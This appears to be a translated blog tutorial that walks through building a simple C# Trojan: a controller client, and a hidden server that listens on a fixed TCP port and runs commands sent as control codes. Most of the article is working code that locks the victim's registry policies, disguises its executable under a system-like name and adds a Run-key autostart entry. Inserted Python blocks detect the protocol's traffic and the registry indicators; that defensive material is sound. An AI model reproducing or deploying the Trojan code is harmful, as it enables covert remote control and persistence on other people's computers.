Using C# to implement a Trojan program

Source: Internet
Author: User
Some time ago I wrote a C# Trojan horse program (see the earlier program). Sorry, I did not write the analysis at the time, which disappointed everyone. I am adding it now :).
Preface:
My skills are not very strong, so if you want to learn Trojan techniques this may not inspire you. This article is intended for friends who want to learn C#.
Trojan introduction (refer to the principle discussion in Hacker Defense Line):
Because this program is a Trojan, some basic knowledge of how a Trojan is composed is described first, since it will be referred to in many places below. A complete Trojan system consists of hardware, software, and the connection between them. This section mainly covers the software, which consists of the control-end program, the Trojan program (a background service program), and the Trojan configuration program. The control end remotely controls the program running on the server. The Trojan program sneaks onto the server to obtain operating permissions there. The Trojan configuration program sets the Trojan's port number, trigger conditions and name, and makes the program stored on the server more concealed.
Technologies used:
The control program sends control codes to control the server; the server program runs in the background and modifies the registry to carry out the control. The technology is not very difficult; it mainly exercises C#'s network programming and registry modification.
Control end development:
The control end sends a control code to the server. After receiving the control code, the server (the Trojan program) carries out the requested action. When the server completes the work, it returns a success message.
The control codes can be defined by yourself and need no detailed explanation. The main difficulties are as follows.
1. Connection request
The System.Net.Sockets.TcpClient class from the .NET class library is used:
TcpClient(string hostname, int port)
hostname is the name of the host to be controlled; an IP address can also be used.
port is the port number.
    // System.EventArgs is the base class for classes that contain event data
    private void button7_Click(object sender, System.EventArgs e)
    {
        // Record the operation by adding it to the richTextBox control
        richTextBox1.AppendText("request connection " + textBox1.Text + "\r");
        int port = 6678;
        try
        {
            // Initialize a new TcpClient instance and connect to the specified port on the specified host
            // (client is a TcpClient field of the form)
            client = new TcpClient(textBox1.Text, port);
        }
        catch
        {
            MessageBox.Show("The server is not online! Check that you entered the host name.");
            richTextBox1.AppendText("The server is not online! Check that you entered the host name.");
        }
    } // private void button7_Click
2. Test whether the controlled machine is connected. The program sends the control code and checks whether the controlled side responds; if a response comes back, the control connection works.
    // Provides a data stream for network access
    private NetworkStream stream;
The code is as follows:
    private void button8_Click(object sender, System.EventArgs e)
    {
        // Record the operation
        richTextBox1.AppendText("test connection" + "\r");
        try
        {
            stream = client.GetStream();
            if (stream.CanWrite)
            {
                // Send the control code
                string control = "jiance";
                byte[] by = System.Text.Encoding.ASCII.GetBytes(control.ToCharArray());
                stream.Write(by, 0, by.Length);
                // Flush the buffered data onto the network
                stream.Flush();
                // Start the thread that receives the reply
                // receive is the function executed by the thread; see the analysis below
                threadReceive = new Thread(new ThreadStart(receive));
                threadReceive.Start();
            }
        }
        catch (Exception ee)
        {
            richTextBox1.AppendText(ee.Message + "\r");
            MessageBox.Show(ee.Message);
        }
    }
3. Sending the control code
    private void button9_Click(object sender, System.EventArgs e)
    {
        // Choose the control code to send; radioButton1..6 are form controls
        if (radioButton1.Checked) { control = form2.zhucex; }
        else if (radioButton2.Checked) { control = form3.zhuces; }
        else if (radioButton3.Checked) { control = warring; }
        else if (radioButton4.Checked) { control = suggest; }
        else if (radioButton5.Checked) { control = form4.mumawe; }
        else if (radioButton6.Checked) { control = drop; }
        if (control == "000000")
        {
            MessageBox.Show("You have not entered any control target! No control signal will be sent.");
            richTextBox1.AppendText("You have not entered any control target! No control signal will be sent.");
        }
        else
        {
            try
            {
                // Record the operation
                richTextBox1.AppendText(control + " trying to control, waiting for response..." + "\r");
                stream = client.GetStream();
                if (stream.CanWrite)
                {
                    byte[] by = System.Text.Encoding.ASCII.GetBytes(control.ToCharArray());
                    stream.Write(by, 0, by.Length);
                    stream.Flush();
                    threadReceive = new Thread(new ThreadStart(receive));
                    threadReceive.Start();
                } // endif
            } // try
            catch
            {
                richTextBox1.AppendText("The server is not connected. The control is invalid!" + "\r");
                MessageBox.Show("The server is not connected. The control is invalid!" + "\r");
            }
        } // else
    }

4. Function executed by the thread
    private void receive()
    {
        // Buffer for the data to be read
        byte[] bb = new byte[3];
        // Read 3 bytes; i is the number of bytes actually read
        int i = stream.Read(bb, 0, 3);
        // Convert to a string. For a Chinese control code use
        // string ss = System.Text.Encoding.Unicode.GetString(bb, 0, i);
        string ss = System.Text.Encoding.ASCII.GetString(bb, 0, i);
        // hjc means the connection succeeded, hkz means the control succeeded
        if (ss == "hjc")
        {
            MessageBox.Show("connection successful");
            richTextBox1.AppendText("connection successful");
        }
        if (ss == "hkz")
        {
            richTextBox1.AppendText(control + " control succeeded" + "\r");
            MessageBox.Show(control + " control succeeded" + "\r");
        }
    }
Server development:
To implement the Trojan service program, three functions are needed: running in the background (hiding), receiving the control code, and modifying the registry. These three aspects are introduced below:
1. In Visual C# it is easy to create a background service program. First create a new C# Windows application; the project name is up to you (to stay hidden, use a name similar to a system program). Set the form's "ShowInTaskbar" property to false so that it is not shown in the taskbar while running, and set the "WindowState" property to Minimized so that the form runs hidden. You can also set these in InitializeComponent(), which performs initialization and runs before the form is displayed. The code is as follows:
    private void InitializeComponent()
    {
        //
        // Form1
        //
        // Scaling base and size of the form
        this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
        this.ClientSize = new System.Drawing.Size(368, 357);
        // Form name
        this.Name = "Form1";
        // Properties that keep the form hidden while running
        this.ShowInTaskbar = false;
        this.Text = "Form1";
        this.WindowState = System.Windows.Forms.FormWindowState.Minimized;
    }
2. Receiving the control code. This must start when the service program starts, so the listening thread is started during program initialization and is therefore placed in the form constructor. The annotated code is as follows:
    public Form1() // form constructor
    {
        //
        // Required for Windows Form Designer support
        //
        InitializeComponent();

        //
        // TODO: add any constructor code after the InitializeComponent call
        //
        // Add your listening code here
        // The port could be made configurable; a fixed port is used here
        int port = 6678;
        // System.Net.Sockets.TcpListener listens for TCP client connections
        // (listener is a TcpListener field of the form)
        listener = new TcpListener(port);
        // Start listening
        listener.Start();
        // Add a thread that receives control codes. To stop the thread, use Thread.Abort()
        // reControlCode is the function the thread executes; it selects the
        // appropriate registry-modification function according to the received control code
        Thread thread = new Thread(new ThreadStart(reControlCode));
        thread.Start();
    }
The reControlCode function is shown below; for the complete code, see the program.
    private void reControlCode()
    {
        // listener.AcceptSocket() blocks until a client connects and returns the accepted socket
        // (socket is a Socket field of the form)
        socket = listener.AcceptSocket();
        // Run while the connection is alive
        while (socket.Connected)
        {
            // Receive the control code (at most 6 bytes per read)
            byte[] by = new byte[6];
            int i = socket.Receive(by, by.Length, SocketFlags.None);
            string ss = System.Text.Encoding.ASCII.GetString(by, 0, i);
            // Perform a different function depending on the control code
            switch (ss)
            {
                case "jiance": // test connection: return the test reply
                    string str = "hjc";
                    byte[] bytee = System.Text.Encoding.ASCII.GetBytes(str);
                    socket.Send(bytee, 0, bytee.Length, SocketFlags.None);
                    break;
                case "zx1000":
                    // Registry-modification function, defined by yourself; see the analysis below
                    UnLogOff();
                    // Return the control reply
                    RetMessage();
                    break;
                case "zx0100":
                    // Registry-modification function
                    UnClose();
                    // Return the control reply
                    RetMessage();
                    break;
                // The remaining cases follow the same pattern as the previous one
                default:
                    break;
            } // switch
        } // while
    } // private void reControlCode
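The fixed framing that the control-end section and reControlCode above establish (6-byte ASCII commands read with a 6-byte buffer, 3-byte ASCII replies read with a 3-byte buffer) is what makes this traffic easy to recognise on the wire. The following Python is an added detection-side example, not code from the article: it splits a reassembled session the same way the Trojan reads it and labels each frame. The "zx" family pattern and the sample capture are assumptions based on the two cases the article shows.

```python
import re

# Control codes the article documents: 6-byte ASCII commands, 3-byte ASCII replies.
COMMANDS = {b"jiance": "probe", b"zx1000": "UnLogOff", b"zx0100": "UnClose"}
REPLIES = {b"hjc": "probe ack", b"hkz": "control ack"}
# Assumed family pattern: the article says its other cases are "the same as the
# previous one", so any 6-byte "zx" + four 0/1 digits is treated as a probable command.
ZX_FAMILY = re.compile(rb"^zx[01]{4}$")

def split_frames(stream, size):
    """Mimic the trojan's fixed-size reads: each Receive/Read consumes `size` bytes."""
    return [stream[i:i + size] for i in range(0, len(stream), size)]

def classify_session(client_to_server, server_to_client):
    """Label every frame of one TCP session and decide whether it matches the protocol.

    Returns (events, matched). Both directions are reassembled byte strings; the
    ordering between directions is not preserved, only the frame sequence per side.
    """
    events = []
    for frame in split_frames(client_to_server, 6):
        if frame in COMMANDS:
            events.append(("cmd", COMMANDS[frame]))
        elif ZX_FAMILY.match(frame):
            events.append(("cmd", "zx-family:" + frame.decode("ascii")))
        else:
            events.append(("cmd", "unknown"))
    for frame in split_frames(server_to_client, 3):
        events.append(("reply", REPLIES.get(frame, "unknown")))
    # A probe followed by its 3-byte ack is the minimal signature of this trojan.
    matched = ("cmd", "probe") in events and ("reply", "probe ack") in events
    return events, matched

# Constructed capture: probe, the NoLogOff command and an assumed third family code,
# answered by the probe ack and two control acks (sample data, not a real capture).
SAMPLE_C2S = b"jiance" + b"zx1000" + b"zx0010"
SAMPLE_S2C = b"hjc" + b"hkz" + b"hkz"

if __name__ == "__main__":
    for event in classify_session(SAMPLE_C2S, SAMPLE_S2C)[0]:
        print(event)
```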
3. The Microsoft.Win32 namespace in .NET provides two kinds of classes: classes for handling events raised by the operating system, and classes for working with the system registry. Its usage is shown below. Here I wrote a subroutine that modifies the registry so that the computer cannot log off. Before doing so, understand the registry: under the subkey SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer, if the value NoLogOff is set to 1, the computer cannot be logged off. The following C# function modifies the registry:
    private void UnLogOff()
    {
        // Obtain the top-level node (hive) of the host registry
        Microsoft.Win32.RegistryKey rLocal = Registry.LocalMachine;
        // Registry subkey variable (null until the subkey is opened)
        RegistryKey key1 = null;
        try
        {
            // RegistryKey.OpenSubKey(string name, bool writable)
            // name is the subkey to open; writable = true allows modification (the default is false)
            key1 = rLocal.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer", true);
            // Set the value name and data under the subkey
            key1.SetValue("NoLogOff", 1);
            // Close the opened subkey
            key1.Close();
            // Append to the warning string (mystr is a string field of the form)
            mystr = mystr + @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer value NoLogOff has been modified! Set it to 0!";
        }
        catch { }
        // If the subkey does not exist, create it
        if (key1 == null)
        {
            try
            {
                // RegistryKey.CreateSubKey(string subkey) creates (or opens) the required subkey
                RegistryKey key2 = rLocal.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer");
                key2.SetValue("NoLogOff", 1);
                key2.Close();
                mystr = mystr + @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer value NoLogOff has been modified! Set it to 0!";
            }
            catch { }
        }
    }
4. Another important function of a Trojan program is self-replication and relocation. When a Trojan is introduced onto a controlled host, it must hide itself automatically in the System or System32 directory to avoid detection. The relocation code is analyzed below. Its main job is to move the Trojan executable (C:\winnt\system\msdoss.exe and d:\winnt\system32\expleror.exe in the code below) to the other drive and rename it. The .NET namespace System.IO allows synchronous and asynchronous reading and writing of data streams and files; here the System.IO.File class is used.
    private void moveCC1()
    {
        try
        {
            // File.Move(string sourceFileName, string destFileName) moves a file
            // sourceFileName is the file to move, destFileName is its new path
            File.Move(@"C:\winnt\system\msdoss.exe", @"d:\winnt\system32\expleror.exe");
        }
        catch { }
        // Make the moved Trojan start automatically; the analysis is the same as before
        RegistryKey rLocal = Registry.LocalMachine;
        RegistryKey key1 = null;
        try
        {
            key1 = rLocal.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", true);
            key1.SetValue("microsoftt", @"d:\winnt\system32\expleror.exe");
            key1.Close();
        }
        catch { }
        if (key1 == null)
        {
            try
            {
                RegistryKey key2 = rLocal.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run");
                key2.SetValue("microsoftt", @"d:\winnt\system32\expleror.exe");
                key2.Close();
            }
            catch { }
        }
    } // moveCC1()
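The two registry changes made in sections 3 and 4 above (the Explorer policy value and the Run entry pointing at a renamed executable) leave a footprint an administrator can check offline. The following Python is an added defender-side example, not part of the article: it parses a reg-export style dump (a constructed sample is embedded), flags Explorer policy lockdown values, and flags Run entries that live outside the Windows directories or whose file name is a near-miss of a system binary. The trusted directory prefixes and the lookalike target list are assumptions to adjust per host.

```python
# Constructed .reg export (sample data, not a real host) covering the two keys the article modifies.
SAMPLE_REG = r'''[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLogOff"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\System32\\SecurityHealthSystray.exe"
"microsoftt"="d:\\winnt\\system32\\expleror.exe"
'''
EXPLORER_POLICY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"
RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
LOCKDOWN_VALUES = {"NoLogOff", "NoClose"}  # NoLogOff is what the article's UnLogOff() sets
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files")  # assumption: adjust per host
LOOKALIKE_TARGETS = ["explorer.exe", "svchost.exe", "microsoft"]  # assumption

def parse_reg(text):
    """Return {key: {name: value}} from a .reg export; handles dword and string values."""
    keys, current = {}, None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            name, _, raw = line[1:].partition('"=')
            if raw.startswith("dword:"):
                keys[current][name] = int(raw[6:], 16)
            elif len(raw) >= 2 and raw[0] == raw[-1] == '"':
                keys[current][name] = raw[1:-1].replace("\\\\", "\\")  # .reg doubles backslashes
    return keys

def edit_distance(a, b):
    """Levenshtein distance, used to catch names that mimic system binaries."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def audit(text):
    """Return human-readable findings for the registry indicators described above."""
    keys, findings = parse_reg(text), []
    for name, value in keys.get(EXPLORER_POLICY, {}).items():
        if name in LOCKDOWN_VALUES and value:
            findings.append(f"policy lockdown: {name}={value}")
    for name, path in keys.get(RUN_KEY, {}).items():
        low = str(path).lower()
        if not low.startswith(TRUSTED_PREFIXES):
            findings.append(f"run entry outside trusted dirs: {name} -> {path}")
        exe = low.rsplit("\\", 1)[-1]
        if any(0 < edit_distance(exe, t) <= 2 for t in LOOKALIKE_TARGETS):
            findings.append(f"lookalike binary name: {name} -> {path}")
    return findings
```

Run `audit(open("export.reg").read())` on a dump produced by `reg export` of the two keys to apply the same checks to a real host.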
With that, a simple C# Trojan is complete.
